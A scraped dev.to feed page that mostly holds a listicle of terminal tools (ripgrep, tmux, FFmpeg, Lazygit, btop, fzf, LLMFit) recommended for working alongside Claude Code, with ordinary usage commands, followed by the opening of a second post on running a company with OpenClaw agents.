&lt;p&gt;For development, Composio provides a playground with test users, execution logs, and real-time trigger streaming so you can iterate on agent behaviour locally before going to production.&lt;/p&gt;


&lt;h2&gt;
  
  
  3. &lt;a href="https://github.com/burntsushi/ripgrep" rel="noopener noreferrer"&gt;ripgrep&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The fastest way to search through a codebase from the terminal.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx24j0f5r4gi5tiwpdz3m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx24j0f5r4gi5tiwpdz3m.png" alt="ripgrep cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;It is a ridiculously fast search tool for the terminal.&lt;/p&gt;

&lt;p&gt;It lets you search through files, code, and folders almost instantly.&lt;/p&gt;

&lt;p&gt;If you have ever used &lt;code&gt;grep&lt;/code&gt;, which I assume you have, ripgrep is a faster, drop-in replacement that holds up in real-world repos.&lt;/p&gt;

&lt;p&gt;A simple example:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;rg &lt;span class="s2"&gt;"useEffect"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That will search for &lt;code&gt;useEffect&lt;/code&gt; across your entire project and show you where it appears.&lt;/p&gt;
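
&lt;p&gt;A couple more patterns I reach for a lot (the search terms and globs here are just examples):&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# limit the search to TypeScript files
rg "useEffect" --type ts

# search only files matching a glob
rg "TODO" -g "*.test.js"

# case-insensitive search, including hidden files
rg -i "api_key" --hidden
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
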
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;This is one of the first tools I'd install.&lt;/p&gt;

&lt;p&gt;When working on a real-world repo, you are constantly searching for things. Function names, config values, and whatnot.&lt;/p&gt;

&lt;p&gt;ripgrep basically makes that fast.&lt;/p&gt;

&lt;p&gt;Even Claude Code defaults to using this tool when searching for things in its workflow. Overall, it is just super handy to have a quick way to move around the repo yourself without digging around manually.&lt;/p&gt;


&lt;h2&gt;
  
  
  4. &lt;a href="https://github.com/tmux/tmux" rel="noopener noreferrer"&gt;tmux&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ A better way to manage terminal sessions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;tmux lets you run multiple terminal sessions inside one terminal.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd69oiqggj0gavhw01fve.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd69oiqggj0gavhw01fve.webp" alt="tmux workflow" width="800" height="466"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You can split panes, open multiple windows, switch between them quickly, and keep everything organized without opening a bunch of separate &lt;strong&gt;terminal tabs&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;It might feel a little unnecessary at first. But once you get used to it, there is no way back.&lt;/p&gt;
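
&lt;p&gt;The basics are only a couple of commands (the session name is just an example); the rest lives behind the default &lt;code&gt;Ctrl-b&lt;/code&gt; prefix key:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# start a named session
tmux new -s claude

# split the current pane: Ctrl-b % (vertical), Ctrl-b " (horizontal)
# move between panes: Ctrl-b + arrow keys
# detach, leaving everything running: Ctrl-b d

# reattach later
tmux attach -t claude
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
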
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;For me, tmux is one of the most useful tools to pair with Claude Code, and it is actually what is running in my terminal right now as I work on this blog inside Neovim. 👀&lt;/p&gt;

&lt;p&gt;I usually have Claude in a pane, with Neovim or a server running in one window, Lazygit in another, and then some extra panes for running commands.&lt;/p&gt;

&lt;p&gt;If you use Neovim, it gets even better. You can have Claude open in one split and Neovim in another. As Claude makes changes, if you need to edit something, Neovim is right there. And for diffs or Git work, Lazygit is sitting in another window.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkyc3uxa400tcfr35714m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkyc3uxa400tcfr35714m.png" alt="tmux workflow with claude code and lazygit" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;How cool is that?&lt;/p&gt;

&lt;p&gt;You are not constantly jumping between tabs or losing track of what is running where.&lt;/p&gt;


&lt;h2&gt;
  
  
  5. &lt;a href="https://github.com/FFmpeg/FFmpeg" rel="noopener noreferrer"&gt;FFmpeg&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The go-to CLI tool for handling just about any media file.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxi9ut1s6ljrfojjzlr9r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxi9ut1s6ljrfojjzlr9r.png" alt="ffmpeg cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;Honestly, this is one of the best tools I have added to my workflow recently.&lt;/p&gt;

&lt;p&gt;FFmpeg is a command line tool for working with media files. You can use it to convert images from one format to another, like PNG to JPG, convert video formats, compress files, trim audio, and do all sorts of file processing.&lt;/p&gt;

&lt;p&gt;It supports basically every format you can think of.&lt;/p&gt;

&lt;p&gt;As developers, we end up doing this kind of stuff all the time. And having one tool that handles all of it from the terminal is just super handy.&lt;/p&gt;
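
&lt;p&gt;A few everyday conversions, to give you an idea (the file names are just placeholders):&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# convert an image from PNG to JPG
ffmpeg -i screenshot.png screenshot.jpg

# compress a video (higher CRF means smaller file, lower quality)
ffmpeg -i input.mp4 -vcodec libx264 -crf 28 output.mp4

# trim a clip without re-encoding
ffmpeg -i input.mp4 -ss 00:00:10 -to 00:00:30 -c copy clip.mp4
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
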

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;FUN FACT:&lt;/strong&gt; Almost all the online media tools that you use on the internet, like online video compressors and similar stuff, are powered by FFmpeg under the hood.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Once you have it in your terminal, you never really need to visit those sites again.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;The only catch is that FFmpeg commands are a little complex.&lt;/p&gt;

&lt;p&gt;Even for a simple task, the syntax takes some deciphering.&lt;/p&gt;

&lt;p&gt;Here's a quick command to crop a video file:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ffmpeg &lt;span class="nt"&gt;-i&lt;/span&gt; input.mp4 &lt;span class="nt"&gt;-vf&lt;/span&gt; &lt;span class="s2"&gt;"crop=1280:720:0:0"&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt;:a copy output.mp4
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That is exactly where Claude Code becomes useful.&lt;/p&gt;

&lt;p&gt;You can just describe what you want in plain English, and let Claude generate the right FFmpeg command for you.&lt;/p&gt;


&lt;h2&gt;
  
  
  6. &lt;a href="https://github.com/jesseduffield/lazygit" rel="noopener noreferrer"&gt;Lazygit&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ A simple TUI for Git&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hlcu02qahtbawpce5ay.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hlcu02qahtbawpce5ay.png" alt="lazygit cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;Lazygit is a terminal UI for Git.&lt;/p&gt;

&lt;p&gt;It gives you a much nicer way to handle things like commits, branches, stashing, rebasing, and reviewing changes without typing every Git command manually.&lt;/p&gt;

&lt;p&gt;You still stay in the terminal.&lt;/p&gt;

&lt;p&gt;It just makes the whole Git workflow super easy, and you do not need to remember and type out any commands. Just knowing the concepts is enough.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;This is one I always have open beside Claude Code.&lt;/p&gt;

&lt;p&gt;When Claude makes a lot of changes in a bunch of files, Lazygit makes it easier to review everything, stage only what you want, and manage the overall Git workflow.&lt;/p&gt;

&lt;p&gt;I usually keep Lazygit open in every session inside tmux, in its own window, so I can quickly jump there and handle Git stuff whenever I need to.&lt;/p&gt;

&lt;p&gt;I talked about tmux earlier in the list, and this combo works really well.&lt;/p&gt;


&lt;h2&gt;
  
  
  7. &lt;a href="https://github.com/aristocratos/btop" rel="noopener noreferrer"&gt;btop&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ A much better way to monitor your system&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fggie92tumu7etywbvlrx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fggie92tumu7etywbvlrx.png" alt="btop cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;btop is a system monitor for the terminal.&lt;/p&gt;

&lt;p&gt;It gives you a clean view of CPU, memory, disk, network, and running processes, all in one place.&lt;/p&gt;

&lt;p&gt;There is also htop, which a lot of people already know and use. But personally, I prefer btop.&lt;/p&gt;

&lt;p&gt;It just feels a bit more user-friendly, looks nicer, and makes filtering processes easier.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;When you are doing a lot inside the terminal, especially with bigger repos, it is really useful to keep an eye on system usage.&lt;/p&gt;

&lt;p&gt;That might be Claude, any processes it launches with your permission, local servers, or anything else running in the background.&lt;/p&gt;

&lt;p&gt;btop gives you a quick way to see what is eating memory, what is using CPU, and whether your machine is starting to struggle, especially when you're using local models.&lt;/p&gt;


&lt;h2&gt;
  
  
  8. &lt;a href="https://github.com/junegunn/fzf" rel="noopener noreferrer"&gt;fzf&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The backbone of fuzzy finding in the terminal&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqev3t1z88tdq2vt87u8e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqev3t1z88tdq2vt87u8e.png" alt="fzf cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;I have probably been using this tool longer than any other in this list.&lt;/p&gt;

&lt;p&gt;fzf is a command line fuzzy finder.&lt;/p&gt;

&lt;p&gt;It lets you search and pick things interactively from the terminal.&lt;/p&gt;

&lt;p&gt;That could be files, directories, Git branches, command history, processes, or really anything you can pipe into it.&lt;/p&gt;

&lt;p&gt;If you haven't heard about this tool or have never used it, you are doing something wrong 😏.&lt;/p&gt;

&lt;p&gt;A simple example:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;find &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;-type&lt;/span&gt; f | fzf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This gives you a fuzzy searchable list of files in the current directory.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;This is one of those tools that just makes terminal workflows feel faster.&lt;/p&gt;

&lt;p&gt;Whether I am jumping between files, searching through something, or picking from a long list of options, fzf is usually involved somewhere. I have so many scripts built around fzf.&lt;/p&gt;
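
&lt;p&gt;A tiny sketch of the kind of script I mean, assuming you are inside a Git repo (the editor is whatever &lt;code&gt;$EDITOR&lt;/code&gt; points to):&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# fuzzy-pick a branch and switch to it
git switch "$(git branch --format='%(refname:short)' | fzf)"

# fuzzy-pick a file and open it in your editor
"$EDITOR" "$(fzf)"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
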

&lt;p&gt;And when you are already spending a lot of time in the terminal with Claude Code, that kind of speed matters.&lt;/p&gt;

&lt;p&gt;It is not really a Claude-specific tool. It is one of the foundational pieces that make working in the terminal, and moving between things, a lot smoother.&lt;/p&gt;


&lt;h2&gt;
  
  
  9. (Optional) &lt;a href="https://github.com/AlexsJones/llmfit" rel="noopener noreferrer"&gt;LLMFit&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Handy if you are experimenting with local or custom models alongside Claude Code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9agawf7zphwgqvrnqcbp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9agawf7zphwgqvrnqcbp.png" alt="llmfit cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;LLMFit is a CLI tool that scans your hardware and tells you which local AI models your machine can run smoothly.&lt;/p&gt;

&lt;p&gt;If you are planning to run a local model, it is a nice way to avoid downloading something that your system will struggle with. Its whole purpose is to help match models to the machine you have.&lt;/p&gt;

&lt;p&gt;Installing is as simple as:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;llmfit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Now, to scan your hardware against models, run this:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;llmfit scan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;and it will list out all the models with their metadata and performance scores based on your hardware.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;This one is definitely more niche.&lt;/p&gt;

&lt;p&gt;But if you are running Claude Code with a local or custom model setup, it can help you figure out what will run well on your machine before you waste time downloading the wrong model.&lt;/p&gt;

&lt;p&gt;It is not something everyone will need, but for people who prefer the Claude Code agent and want to test newer local or custom models from other providers, this is an option as well.&lt;/p&gt;

&lt;p&gt;You can find many guides on doing that. One that I referenced while trying it out is by &lt;a href="https://medium.com/@luongnv89/run-claude-code-on-local-cloud-models-in-5-minutes-ollama-openrouter-llama-cpp-6dfeaee03cda" rel="noopener noreferrer"&gt;Luong NGUYEN&lt;/a&gt;.&lt;/p&gt;


&lt;h2&gt;
  
  
  A few more nice ones
&lt;/h2&gt;

&lt;p&gt;There are also a few other terminal tools I use a lot that I did not want to give a full section to, but they are still very much part of the overall workflow.&lt;/p&gt;

&lt;p&gt;Things like &lt;strong&gt;fd&lt;/strong&gt;, &lt;strong&gt;zoxide&lt;/strong&gt;, &lt;strong&gt;eza&lt;/strong&gt;, &lt;strong&gt;yazi&lt;/strong&gt;, and &lt;strong&gt;bat&lt;/strong&gt; all make the terminal feel nicer to work in.&lt;/p&gt;

&lt;p&gt;Some help you jump between directories faster. Others make listing files, previewing content, or browsing the filesystem way better than the defaults.&lt;/p&gt;
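
&lt;p&gt;To give you a quick taste (assuming each tool is installed, and zoxide is initialized in your shell; the names are just examples):&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# fd: find files by name, fast
fd config

# bat: cat with syntax highlighting
bat README.md

# eza: a nicer ls, with Git status
eza -la --git

# zoxide: jump to a directory you have visited before
z myproject
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
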

&lt;p&gt;I leave it up to you to research these tools.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F860iemg7j7gkx4mp7ehw.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F860iemg7j7gkx4mp7ehw.gif" alt="steve smith playing with magnifying glass" width="490" height="368"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;None of these are Claude Code specific.&lt;/p&gt;


&lt;h2&gt;
  
  
  Ones I'd install first
&lt;/h2&gt;

&lt;p&gt;If I had to set this up again from scratch, I’d probably start with &lt;strong&gt;ripgrep&lt;/strong&gt;, &lt;strong&gt;GitHub CLI&lt;/strong&gt;, &lt;strong&gt;tmux&lt;/strong&gt;, and &lt;strong&gt;Lazygit&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;That already covers a lot of the core workflow around Claude Code.&lt;/p&gt;

&lt;p&gt;And separately, I’d also set up &lt;strong&gt;Composio&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;It’s a bit different from the rest here. It’s not exactly just another CLI tool, but more of an MCP server. Really useful if you want to automate parts of your workflow and connect Claude to external tools in a cleaner way.&lt;/p&gt;


&lt;h2&gt;
  
  
  Final thoughts
&lt;/h2&gt;

&lt;p&gt;You definitely do not need every tool in this list.&lt;/p&gt;

&lt;p&gt;But a few of them can make working with Claude Code a lot smoother, especially once you start using it more seriously.&lt;/p&gt;

&lt;p&gt;At the end of the day, it’s really just about making the workflow around Claude feel cleaner and easier to manage.&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=150,height=150,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>productivity</category>
      <category>opensource</category>
      <category>ai</category>
      <category>programming</category>
    </item>
    <item>
      <title>🚀 How to run a fully-autonomous company with OpenClaw 🦞</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 02 Apr 2026 14:39:22 +0000</pubDate>
      <link>https://dev.to/composiodev/how-to-run-a-fully-autonomous-company-with-openclaw-ma5</link>
      <guid>https://dev.to/composiodev/how-to-run-a-fully-autonomous-company-with-openclaw-ma5</guid>
      <description>&lt;p&gt;Imagine owning a company with just one human employee, and that too is yourself. The rest? All OpenClaw agents!&lt;/p&gt;

&lt;p&gt;Before OpenClaw, that would have sounded completely silly, but with it, it's possible, &lt;strong&gt;really possible!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can automate your entire company or simulate a fully functioning one with just OpenClaw and your VPS, Mac Mini, or local system for testing.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fety6wnq6m91tsqhv27gi.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fety6wnq6m91tsqhv27gi.jpg" alt="obama meme" width="640" height="391"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;In this tutorial, you'll learn how to run an entire company using just yourself and a bunch of &lt;strong&gt;OpenClaw agents&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you will learn: ✨&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What OpenClaw is and how it works&lt;/li&gt;
&lt;li&gt;Why storing API keys locally is a bad idea&lt;/li&gt;
&lt;li&gt;Setting up &lt;strong&gt;Composio&lt;/strong&gt; for secure OAuth-based integrations&lt;/li&gt;
&lt;li&gt;Connecting your first app and getting agents up and running 🚀&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ready to become a one-person company? 👀&lt;/p&gt;




&lt;h2&gt;
  
  
  What's OpenClaw?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqljwq3cff8femj5e1s0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqljwq3cff8femj5e1s0.png" alt="OpenClaw Banner" width="800" height="259"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 I assume you already know what OpenClaw is. If not, why are you even here? Just kidding... The blog itself is completely beginner friendly. If you already have an idea of what OpenClaw is, just skip this section.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;OpenClaw is a personal AI assistant you run on your own machine or a server you own. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations, and this idea is what actually makes the one-person company possible.&lt;/p&gt;

&lt;p&gt;Take this as a mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your LLM is the brain (thinks)&lt;/li&gt;
&lt;li&gt;OpenClaw is the body (it can do things)&lt;/li&gt;
&lt;li&gt;The Gateway is the receptionist (routes messages in and results out)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It provides the model with a runtime that can call tools, maintain state, and appear where you already chat (WhatsApp, Telegram, Slack, Discord, etc.). Now, that's just the gist. There's much more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosrayie6pppe2qbj6kan.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosrayie6pppe2qbj6kan.jpg" alt="OpenClaw architecture" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For installation, visit the OpenClaw &lt;a href="https://docs.openclaw.ai/install" rel="noopener noreferrer"&gt;installation guide&lt;/a&gt;, and based on your distro and installation choice, install it on your machine.&lt;/p&gt;

&lt;p&gt;If you just want it running quickly, do the normal installation. If you're even slightly paranoid (which you should be 😮‍💨), use Docker.&lt;/p&gt;

&lt;p&gt;Also, make sure you set up a channel for easier chatting from your phone (preferably Telegram).&lt;/p&gt;

&lt;p&gt;For help setting up a channel, ask OpenClaw itself. It knows itself better than anyone else on the internet.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 If you face issues like &lt;code&gt;OpenClaw: access not configured&lt;/code&gt; when talking with the bot, make sure you run this command:&lt;/p&gt;


&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw pairing approve &amp;lt;telegram/whatsapp/...&amp;gt; &amp;lt;pairing_code&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Just like that, now you have an agent listening on your channel. Message anything, and you should get a reply back.&lt;/p&gt;

&lt;p&gt;From here onwards, I assume you already have OpenClaw running. To make sure everything is working, run this command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw health
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;If not, try running &lt;code&gt;openclaw doctor&lt;/code&gt;, which helps debug your gateway or channel issues.&lt;/p&gt;


&lt;h2&gt;
  
  
  Run a whole company?
&lt;/h2&gt;

&lt;p&gt;Yeah, in theory, you can actually automate or run an entire company. Can't guarantee the company will stand long, but with OpenClaw, it's now possible.&lt;/p&gt;

&lt;p&gt;The only human in the process is going to be yourself. All your employees will be &lt;strong&gt;OpenClaw Agents&lt;/strong&gt;.&lt;/p&gt;

